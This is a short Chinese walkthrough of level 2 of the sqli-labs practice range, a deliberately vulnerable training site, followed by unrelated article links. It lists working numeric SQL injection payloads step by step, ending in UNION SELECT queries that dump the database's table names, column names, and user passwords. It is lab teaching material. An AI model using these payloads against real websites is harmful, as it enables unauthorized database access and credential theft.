SQL注入sqli_labs靶场第二题

解题思路与第一题相同

?id=1 and 1=1 和?id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为数字型注入。

联合查询:

猜解列名数量:3

?id=1 order by 4

判断回显点

?id=-1 union select 1,2,3

爆库、版本号、权限

?id=-1 union select 1,database(),version()--+
?id=-1 union select 1,2,user()--+

爆表、爆列

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

爆账号密码

?id=-1 union select 1,2,(select group_concat(username,password))from users

相关推荐
ByteBlossom36 分钟前
MySQL 面试场景题之如何处理 BLOB 和CLOB 数据类型?
数据库·mysql·面试
玉衡子39 分钟前
九、MySQL配置参数优化总结
java·mysql
-Xie-1 小时前
Mysql杂志(十六)——缓存池
数据库·mysql·缓存
玉衡子1 小时前
八、MySQL全局优化总结&MySQL8新特性
java·mysql
计算机毕业设计木哥2 小时前
计算机毕设选题推荐:基于Java+SpringBoot物品租赁管理系统【源码+文档+调试】
java·vue.js·spring boot·mysql·spark·毕业设计·课程设计
鸿乃江边鸟3 小时前
向量化和列式存储
大数据·sql·向量化
懒虫虫~17 小时前
通过内存去重替换SQL中distinct,优化SQL查询效率
java·sql·慢sql治理
逛逛GitHub17 小时前
1 个神级智能问数工具,刚开源就 1500 Star 了。
sql·github
Huhbbjs18 小时前
SQL 核心概念与实践总结
开发语言·数据库·sql
咋吃都不胖lyh18 小时前
SQL-字符串函数、数值函数、日期函数
sql